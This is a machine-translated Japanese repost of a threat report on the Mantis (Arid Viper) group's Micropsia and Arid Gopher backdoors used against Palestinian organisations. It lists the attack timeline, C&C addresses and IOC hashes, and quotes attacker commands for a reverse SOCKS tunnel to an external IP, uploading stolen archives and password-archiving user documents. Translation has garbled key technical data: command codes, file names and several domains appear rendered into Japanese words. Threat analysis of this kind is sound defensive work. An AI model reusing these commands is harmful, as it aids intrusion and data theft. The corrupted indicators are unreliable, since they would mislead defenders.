マンティス:パレスチナ標的への攻撃に使用された新ツール

スパイグループは、検出を回避し、侵害されたネットワークに留まり続けるために時間と労力を費やします。
パレスチナ領土内で活動していると考えられている脅威アクターである Mantis サイバースパイグループ (別名 Arid Viper、Desert Falcon、APT-C-23) は、更新されたツールセットを展開し、ターゲットを絞るためにあらゆる努力を惜しまず、継続的な攻撃を行っています。ウェブ上で永続的に存在します。
このグループは中東の組織をターゲットにすることで知られていますが、Broadcom Software の子会社である Symantec によって最近発見された活動は、パレスチナ領土の組織に焦点を当てており、悪意のある活動は 2022 年 9 月に始まり、少なくとも 2023 年 2 月まで続きました。月。この種の標的化はマンティスグループにとって前例のないことではなく、2017年にパレスチナ領土内の個人に対する攻撃を明らかにしたことがある。

背景

Mantis は 2014 年から活動しており、一部のサードパーティのレポートによると、2011 年には活動していた可能性があります。このグループは、イスラエルや他の多くの中東諸国の組織をターゲットにしていることで知られています。対象となる分野には政府、軍事、金融、メディア、教育、エネルギー、シンクタンクなどが含まれる。このグループは、フィッシングメールと偽のソーシャルメディアプロファイルを使用してターゲットを騙し、デバイスにマルウェアをインストールさせることで知られています。

カマキリはパレスチナ領土と関係があると広く信じられている。シマンテックはパレスチナ組織への帰属を明確にすることができなかったが、他のベンダーはパレスチナ組織をハマスと結びつけていた。

最新の攻撃では、同グループはカスタムの Micropsia および Arid Gopher バックドアの最新バージョンを使用してターゲットを感染させ、その後、大規模な資格情報の盗難と盗まれたデータの流出を行いました。

攻撃チェーン

この事件の最初の感染経路は不明です。標的となったある組織では、攻撃者は同じツールセットの 3 つの異なるバージョン (つまり、同じツールの異なるバリエーション) を 3 つのコンピュータ グループに展開しました。この方法で攻撃を隔離することは、おそらく予防策です。これらのツールセットのいずれかが発見された場合でも、攻撃者はターゲット ネットワーク上で永続的な存在を維持できます。

以下に、3 つのツールセットのうちの 1 つの使用法を説明します。

悪意のあるアクティビティは、2022 年 12 月 18 日に初めて検出されました。難読化された PowerShell コマンドの 3 つの別々のセットが実行され、埋め込みシェルコードを起動する Base64 でエンコードされた文字列が読み込まれました。シェルコードは、基本的な TCP プロトコルを使用してコマンド アンド コントロール (C&C) サーバー (104.194.222[.]50 ポート 4444) から別のステージをダウンロードする 32 ビット ブートローダーです。

攻撃者は 12 月 19 日に再び攻撃し、最初に資格情報ダンプを実行し、次に Certutil と BITSAdmin を使用して Micropsia バックドアと一般公開されている SSH クライアントである Putty をダウンロードしました。

その後、Micropsia が実行され、C&C サーバーとの接続が開始されます。同日、Micropsia は同じ組織内の他の 3 台のマシンでも処刑されました。いずれの場合も、ファイル名にちなんで名付けられたフォルダー内で実行されます。

csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
コンピューターでは、Micropsia を使用して外部 IP アドレスへのリバース ソックス トンネルを設定します。

CSIDL_COMMON_APPDATA\windowsservicemanageav\windowsservicemanageav.exe -connect 104.194.222[.]50:443 [編集済み]

12 月 20 日、Micropsia は、感染したコンピュータの 1 台で windowspackages.exe と呼ばれる未知の実行可能ファイルを実行するために使用されました。

翌日の 12 月 21 日、RAR が実行され、別の感染したコンピュータ上でファイルがアーカイブされました。

12 月 22 日から 2023 年 1 月 2 日まで、Micropsia は 3 台の感染したコンピューターで Arid Gopher バックドアを実行するために使用されました。次に、Arid Gopher は SetRegRunKey.exe というツールを実行するために使用されます。このツールは、再起動後も実行するようにレジストリに Arid Gopher を追加することで永続性を提供します。また、localsecuritypolicy.exe という未知のファイルも実行されました (攻撃者はこのファイル名を Arid Gopher バックドアとして別の場所で使用しました)。

12 月 28 日、Micropsia はさらに 3 台の感染したコンピュータで windowspackages.exe を実行するために使用されました。

12 月 31 日、Arid Gopher は、感染した 2 台のコンピュータ上で networkwitcherdatamodell.exe および networkuefidiagsbootserver.exe という名前の 2 つの未知のファイルを実行しました。

攻撃者は 1 月 2 日までに、使用していたバージョンの Arid Gopher を無効化し、新しい亜種を導入しました。これは最初のバージョンが発見されたためでしょうか、それとも標準的な操作手順が不明瞭だからでしょうか。

1 月 4 日、Micropsia は、1 台のコンピューター上の csidl_common_appdata\hostupbroker\hostupbroker.exe フォルダーにある 2 つの未知のファイル (どちらも hostupbroker.exe という名前) を実行するために使用されました。これに続いて、RAR ファイルが漏洩します。

CSIDL_COMMON_APPDATA\windowsupserv\windowsupserv.exe -f CSIDL_COMMON_APPDATA\windowspackages\01-04-2023-15-13-39_getf.rar

1 月 9 日、Arid Gopher が 1 台のコンピューター上で 2 つの未知のファイルを実行するために使用されました。

csidl_common_appdata\teamviewrremoteservice\teamviewrremoteservice.exe
csidl_common_appdata\embededmodeservice\embededmodeservice.exe
最後の悪意のあるアクティビティは 1 月 12 日以降に発生し、Arid Gopher が 10 時間ごとに localsecuritypolicy.exe という名前の未知のファイルを実行するために使用されました。

小視症

これらの攻撃に使用された Micropsia バックドアの亜種は、他のベンダーが確認したバージョンをわずかに更新したものと思われます。このイベントでは、Micropsia は複数のファイル名とファイル パスを使用してデプロイしました。

csidl_common_appdata\microsoft\dotnet35\microsoftdotnet35.exe
csidl_common_appdata\microsoftservicesusermanual\systempropertiesinternationaltime.exe
csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
csidl_common_appdata\windowsps\windowsps.exe
Micropsia は WMI を使用して実行され、その主な目的は攻撃者のセカンダリ ペイロードを実行することであるようです。これらには次のものが含まれます。

Arid Gopher (ファイル名: networkvirtualizationstartservice.exe、networkvirtualizationfiaservice.exe、networkvirtualizationseoservice.exe)
リバース SOCK トンネラー (別名 Revsocks) (ファイル名: windowsservicemanageav.exe)
データ抽出ツール(ファイル名:windowsupserv.exe)
2 つの不明なファイル (両方とも hostupbroker.exe という名前)
windowspackages.exe という名前の不明なファイル
これに加えて、Micropsia には、スクリーンショット、キーロギング、データ漏洩に備えて特定のファイル タイプをアーカイブするための WinRAR の使用などの独自の機能があります。

"%PROGRAMDATA%\Software Distributions\WinRAR\Rar.exe" ar -ep1 -v2500k -hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14 "%PRO GRAMDATA% \Software Distributions\Bdl\LMth__C_2023-02-13 17-14-41” “%USERPROFILE%*.xls” ” “%USERPROFILE%*.xlsx” “%USERPROFILE%*.doc” “%USERPROFILE%*.docx” “%USERPROFILE%*.csv” “%USERPROFILE%*.pdf” “%USERPROFILE%*.ppt” “%USERPROF” ILE %*.pptx」「%USERPROFILE%*.odt」 「%USERPROFILE% *.mdb」 「%USERPROFILE%*.accdb」 「%USERPROFILE%*.accde」 「%USERPROFILE%*.txt」 「%USERPROFILE%*.rtf」 「%USERPROFILE%*.vcf」

乾燥ホリネズミ

Arid Gopher は Delphi で書かれた Micropsia とは異なり、Go 言語で書かれています。このイベントで使用された Arid Gopher のバージョンには、次の組み込みコンポーネントが含まれています。

7za.exe – 正規の 7-Zip 実行可能ファイルのコピー
AttestationWmiProvider.exe – 「run」レジストリ値を設定するツール
ServiceHubIdentityHost.exe – Optimum X の正規の Shortcut.exe 実行可能ファイルのコピー
Setup.env – 構成ファイル
Arid Gopher は、未知のファイル networkwitcherdatamodell.exe、localsecuritypolicy.exe、networkuefidiagsbootserver.exe の起動にも使用され、さらに、PyArmor を使用して難読化されたファイルのダウンロードと実行にも使用されました。

C&C サーバーと通信するとき、Arid Gopher はデバイスを 1 つのパスに登録し、おそらくコマンドを受信するために別のパスに接続します。

接続先: http://jumpstartmail[.]com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 79.133.51[.]134) – おそらくデバイスを登録します
次は http://jumpstartmail[.]com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – おそらくコマンドを受信するためのものです。
接続先: http://salimafia[.]net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.]32) – おそらくデバイスを登録するため
次は http://salimafia[.]net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC – おそらくコマンドを受信するためです

Arid Gopher は攻撃者によって定期的に更新および書き換えられているようで、検出を回避している可能性が最も高くなります。このマルウェアの亜種の 1 つは、以前のバージョンの一意のコードとは大きく異なり、以前のバージョンと同じ一意のコードを含むサブルーチンは存在しません。 Mantis はバリアント間でロジックを積極的にシフトしているようですが、これを手動で行うと時間のかかる操作になります。

指示 説明
「c」 おそらく main.exC("cmd") に関連していると思われます
「d」 おそらく main.down2 に関連していると思われます
「す」 おそらく main.OnDSH に関連していると思われます
「シ」 おそらく main.deviceProperties に関連していると思われます
「追伸」 おそらく main.exC("powershell") に関連していると思われます
「ら」 おそらく main.RunAWithoutW に関連しています
「SF」 おそらく main.updateSettings に関連していると思われます
「SL」 おそらく main.searchForLogs に関連していると思われます
「うー」 おそらく main.updateApp に関連していると思われます
「うーん」 おそらく main.updateT に関連していると思われます
「pwnr」 おそらく main.exCWithoutW("powershell") に関連していると思われます
「ラップ」 おそらく main.restartApp に関連していると思われます
「ゲログ」 おそらく main.upAppLogs に関連していると思われます
「うふふ」 おそらく main.collectFi に関連していると思われます
「ウフォフド」 おそらく main.collectFiOrFol に関連していると思われます
「bwp」 おそらく main.browDat に関連していると思われます
「cbh」 おそらく main.delBD に関連していると思われます
「CWR」 おそらく main.exCWithoutW("cmd") に関連しています
「ガフ」 おそらく main.collectFi に関連していると思われます
「ntf」 おそらく main.collectNet に関連する
「スムル」 おそらく main.updateSettings に関連していると思われます

埋め込まれた setup.env ファイルは、分析された Arid Gopher バリアントによって構成データを取得するために使用され、次のコンテンツが含まれています。

DIR=WindowsPerceptionService

エンドポイント=http://jumpstartmail[.]com/IURTIER3BNV4ER

ログ=logs.txt

DID=コード.txt

VER=6.1

EN=2

ST_METHOD=r

ST_MACHINE=false

ST_FLAGS=x

COMPRESSOR=7za.exe

DDIR=リソースファイル

BW_TOO_ID=7463b9da-7606-11ed-a1eb-0242ac120002

SERVER_TOKEN=PDqMKZ91l2XDmDELOrKB

STAPP=AttestationWmiProvider.exe

SHORT_APP=ServiceHubIdentityHost.exe

setup.env 構成ファイルには、同じく Arid Gopher に埋め込まれている別のファイル AttestationWmiProvider.exe が記載されています。このファイルはヘルパーとして機能する 32 ビットの実行可能ファイルであり、再起動時に別の実行可能ファイルが確実に実行されるようにします。実行時に、次のコマンド ライン パラメータがチェックされます。

「key」と文字列パラメータ [RUN_VALUE_NAME]

「値」と文字列パラメータ [RUN_PATHNAME]

次に、 func os/signal.Notify() を使用してシグナル通知を受信するように手配します。通知されると、次のレジストリ値が設定されます。

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”[RUN_VALUE_NAME]” = “[RUN_PATHNAME]”

これまでの調査では、このファイルが再起動時に Arid Gopher を実行するように設定されていることがわかっています。

CSIDL_COMMON_APPDATA\attestationwmiprovider\attestationwmiprovider.exe -key=NetworkVirtualizationStartService “-value=CSIDL_COMMON_APPDATA\networkvirtualizationstartservice\networkvirtualizationstartservice.exe -x”

データ侵害ツール

攻撃者はまた、カスタム ツール (WindowsUpServ.exe という名前の 64 ビット PyInstaller 実行可能ファイル) を使用して、標的の組織から盗んだデータを抽出しました。ツールを実行すると、次のコマンド ライン パラメーターがチェックされます。

「-d」「[FILE_DIRECTORY]」

"-f" "[ファイル名]"

「-f」「[FILENAME]」コマンド ライン引数ごとに、ツールは [FILENAME] の内容をアップロードします。 「-d」「[FILE_DIRECTORY]」コマンド ライン引数ごとに、ツールはフォルダー [FILE_DIRECTORY] に保存されているファイルのリストを取得し、各ファイルのコンテンツをアップロードします。

各ファイルがアップロードされると、ツールは次のパラメータを使用して HTTP POST リクエストを C&C サーバーに送信します。

"kjdfnqweb": [THE_FILE_CONTENT]

"qyiwekq": [HOSTNAME_OF_THE_AFFECTED_COMPUTER]

リモート サーバーがステータス コード 200 で応答するたびに、マルウェアはアップロードされたファイルをローカル ディスクから削除します。マルウェアは、その動作の一部を次のファイルに記録する場合もあります。

「C:\ProgramData\WindowsUpServ\success.txt」

「C:\ProgramData\WindowsUpServ\err.txt」

頑固な相手

Mantis は、大規模なマルウェアの書き換えと、個々の組織に対する攻撃を別々の部分に分割して操作全体の検出を減らしていることからわかるように、成功の可能性を最大化するために時間と労力を惜しみなく投資する断固たる敵対者であるようです。見られる。

IOCインジケーター

SHA256ハッシュ ファイル名 説明
0fb4d09a29b9ca50bc98cb1f0d23bfc21cb1ab602050ce786c86bd2bb6050311 ネットワーク仮想化サービス.exe 乾燥ホリネズミ
3d649b84df687da1429c2214d6f271cc9c026eb4a248254b9bfd438f4973e529 ネットワーク仮想化picservice.exe 乾燥ホリネズミ
82f734f2b1ccc44a93b8f787f5c9b4eca09efd9e8dcd90c80ab355a496208fe4 networkvirtualizationfiaservice.exe 乾燥ホリネズミ
85b083b431c6dab2dd4d6484fe0749ab4acba50842591292fdb40e14ce19d097 networkvirtualizationinithservice.exe 乾燥ホリネズミ
cb765467dd9948aa0bfff18214ddec9e993a141a5fdd8750b451fd5b37b16341 networkvirtualizationfiaservice.exe 乾燥ホリネズミ
f2168eca27fbee69f0c683d07c2c5051c8f3214f8841c05d48897a1a9e2b31f8 networkvirtualizationstartservice.exe 乾燥ホリネズミ
21708cea44e38d0ef3c608b25933349d54c35e392f7c668c28f3cf253f6f9db8 AttestationWmiProvider.exe Arid Gopher 永続化コンポーネント
58331695280fc94b3e7d31a52c6a567a4508dc7be6bdc200f23f5f1c72a3f724 ウィンドウズアップサーブ.exe 抽出ツール
5af853164cc444f380a083ed528404495f30d2336ebe0f2d58970449688db39e ウィンドウズアップサーブ.exe 抽出ツール
0a6247759679c92e1d2d2907ce374e4d6112a79fe764a6254baff4d14ac55038 様々な 小視症
1d1a0f39f339d1ddd506a3c5a69a9bc1e411e057fe9115352482a20b63f609aa 該当なし 小視症
211f04160aa40c11637782973859f44fd623cb5e9f9c83df704cc21c4e18857d xboxaccessorymanagementservice.exe 小視症
d10a2dda29dbf669a32e4198657216698f3e0e3832411e53bd59f067298a9798 システムプロパティ国際時間.exe 小視症
5405ff84473abccc5526310903fcc4f7ad79a03af9f509b6bca61f1db8793ee4 networkvirtualizationseoservice.exe 乾燥ホリネズミの可能性
f38ad4aa79b1b448c4b70e65aecc58d3f3c7eea54feb46bdb5d10fb92d880203 runme.exe 可能なメーターメーター
c4b9ad35b92408fa85b92b110fe355b3b996782ceaafce7feca44977c037556b システムプロパティ国際時間.exe 小視症の可能性
f98bc2ccac647b93f7f7654738ce52c13ab477bf0fa981a5bf5b712b97482dfb windowsservicemanageav.exe リバースソックストンネル
411086a626151dc511ab799106cfa95b1104f4010fe7aec50b9ca81d6a64d299 該当なし シェルコード
5ea6bdae7b867b994511d9c648090068a6f50cb768f90e62f79cd8745f53874d 該当なし シェルコード
6a0686323df1969e947c6537bb404074360f27b56901fa2bac97ae62c399e061 該当なし シェルコード
11b81288e5ed3541498a4f0fd20424ed1d9bd1e4fae5e6b8988df364e8c02c4e SystemPropertiesInternationalTime.rar 不明なファイル
1b62730d836ba612c3f56fa8c3b0b5a282379869d34e841f4dca411dce465ff6 ネットワークスイッチャーデータモデル.exe 不明なファイル
220eba0feb946272023c384c8609e9242e5692923f85f348b05d0ec354e7ac3c hostupbroker.exe 不明なファイル
4840214a7c4089c18b655bd8a19d38252af21d7dd048591f0af12954232b267f hostupbroker.exe 不明なファイル
4a25ca8c827e6d84079d61bd6eba563136837a0e9774fd73610f60b67dca6c02 windowspackages.exe 不明なファイル
624705483de465ff358ffed8939231e402b0f024794cf3ded9c9fc771b7d3689 _pytransform.dll 不明なファイル
7ae97402ec6d973f6fb0743b47a24254aaa94978806d968455d919ee979c6bb4 埋め込みモードサービス.exe 不明なファイル
8d1c7d1de4cb42aa5dee3c98c3ac637aebfb0d6220d406145e6dc459a4c741b2 ローカルセキュリティポリシー.exe 不明なファイル
b6a71ca21bb5f400ff3346aa5c42ad2faea4ab3f067a4111fd9085d8472c53e3 埋め込みモードサービス.exe 不明なファイル
bb6fd3f9401ef3d0cc5195c7114764c20a6356c63790b0ced2baceb8b0bdac51 ローカルセキュリティポリシー.exe 不明なファイル
bc9a4df856a8abde9e06c5d65d3bf34a4fba7b9907e32fb1c04d419cca4b4ff9 networkuefidiagsbootserver.exe 不明なファイル
d420b123859f5d902cb51cce992083370bbd9deca8fa106322af1547d94ce842 チームビューアリモートサービス.exe 不明なファイル
ジャンプスタートメール[.]com 乾燥ゴーファー C&C
ペイデイローン新しい[.]com 乾燥ゴーファー C&C
ピクチャーワールド[.]情報 乾燥ゴーファー C&C
rnacgroup[.]com C&C
サリマフィア[.]ネット 乾燥ゴーファー C&C
ソモイネット 乾燥ゴーファー C&C
ソフトユーティリティ[.]com C&C
クロエ・ボアマン[.]com 小視症C&C
クリストン・コール[.]com 小視症C&C
http://5.182.39[.]44/esuzmwmrtajj/cmsnvbyawttf/mkxnhqwdywbu 抽出ツール C&C

 

元記事はChief Security Officerによるもので、転載の際はhttps://cncso.com/jp/パレスチナ人標的への攻撃に使われたマンティス-h。

のように (1)
前の 2023年11月29日午後10時01分
2023年12月3日午前9時11分

関連する提案